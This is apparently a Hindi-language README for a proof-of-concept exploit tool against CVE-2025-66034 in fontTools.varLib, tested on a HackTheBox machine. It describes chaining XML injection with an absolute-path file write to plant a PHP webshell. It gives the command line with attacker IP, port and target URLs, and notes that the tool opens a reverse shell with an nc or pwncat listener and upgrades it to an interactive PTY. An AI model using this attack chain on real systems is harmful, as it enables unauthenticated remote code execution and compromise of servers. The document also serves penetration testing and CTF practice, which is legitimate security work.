
CVE-2025-66034 - fontTools varLib Arbitrary File Write → RCE fontTools.varLib में Arbitrary File Write + XML Injection कमजोरी के लिए PoC शोषण।
fontTools.varLibमें मनमाना फ़ाइल लेखन + XML इंजेक्शन भेद्यता के लिए PoC शोषण HackTheBox — VarIaType पर परीक्षित
fontTools.varLib .designspace XML फ़ाइलों को प्रोसेस करके वेरिएबल फॉन्ट बनाता है। दो कमजोरियां मिलकर प्री-ऑथ RCE प्राप्त करती हैं:
| # | प्राथमिक तत्व | विवरण |
|---|
| 1 | CDATA स्प्लिट के माध्यम से XML इंजेक्शन | <labelname> के अंदर हमलावर-नियंत्रित सामग्री को आउटपुट फ़ॉन्ट फ़ाइल बॉडी में शाब्दिक रूप से लिखा जाता है, जिससे मनमाना डेटा इंजेक्शन संभव होता है |
| 2 | os.path.join() बाईपास के माध्यम से मनमाना फ़ाइल लेखन | <variable-font> का filename गुण एक निरपेक्ष पथ स्वीकार करता है। जब os.path.join() को पास किया जाता है, तो यह इच्छित आउटपुट निर्देशिका को छोड़ देता है और किसी भी हमलावर-निर्दिष्ट फ़ाइलसिस्टम पथ पर लिखता है |
दोनों प्राथमिक तत्वों को श्रृंखलाबद्ध करने से PHP वेबशेल को वेब-सुलभ पथ पर लिखा जा सकता है, जिससे अप्रमाणित रिमोट कोड निष्पादन प्राप्त होता है।
python3 font_varlib.py \
--ip <attacker-ip> \
--port <port> \
--upload http://target.htb/tools/variable-font-generator/process \
--webroot /var/www/portal.target.htb/public/files \
--shell http://portal.target.htb/files
| फ़्लैग | विवरण |
|---|---|
--ip | रिवर्स शेल कॉलबैक के लिए हमलावर IP |
--port | श्रोता पोर्ट |
--upload | फ़ॉन्ट प्रोसेसिंग एंडपॉइंट का पूरा URL (POST) |
--webroot | सर्वर-साइड निरपेक्ष पथ जो वेब-सुलभ निर्देशिका में मैप करता है |
--shell | आधार URL जिसके अंतर्गत वेबशेल सुलभ होगा |
--no-listen | ऑटो-लिसनर को छोड़ें — इसके बजाय मैनुअल कमांड प्रिंट करें |
--pwncat | nc के बजाय pwncat-cs का उपयोग करें (यदि उपलब्ध हो तो प्राथमिकता) |
pip install requests fonttools
fontTools.FontBuilder का उपयोग करके दो न्यूनतम .ttf फ़ाइलें (source-light.ttf, source-regular.ttf) उत्पन्न की जाती हैं.designspace — एक तैयार XML फ़ाइल निम्नलिखित के साथ बनाई जाती है:
<labelname> के अंदर CDATA स्प्लिट के माध्यम से PHP वेबशेल इंजेक्ट किया जाता है<variable-font> के filename के रूप में सेट किया जाता है, os.path.join() के माध्यम से output_dir को बायपास करते हुए.designspace + मास्टर फ़ॉन्ट प्रोसेसिंग एंडपॉइंट पर POST किए जाते हैं.php फ़ाइल का अनुरोध किया जाता है, जो रिवर्स शेल पेलोड को निष्पादित करती हैpython3 -c 'import pty; pty.spawn("/bin/bash")' के माध्यम से एक PTY उत्पन्न करती है और पूरी तरह से इंटरैक्टिव शेल के लिए TERM + stty सेट करती है| क्षेत्र | |
|---|---|
| CVE | CVE-2025-66034 |
| प्रभावित घटक | fontTools.varLib |
| प्रभाव | अप्रमाणित मनमाना फ़ाइल लेखन → रिमोट कोड निष्पादन |
| संदर्भ | वेब एप्लिकेशन जो फ़ॉन्ट प्रोसेसिंग एंडपॉइंट को उजागर करता है |
यह उपकरण केवल अधिकृत पैठ परीक्षण और CTF उपयोग के लिए है। उन सिस्टमों पर न चलाएं जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति नहीं है।
4nuxd द्वारा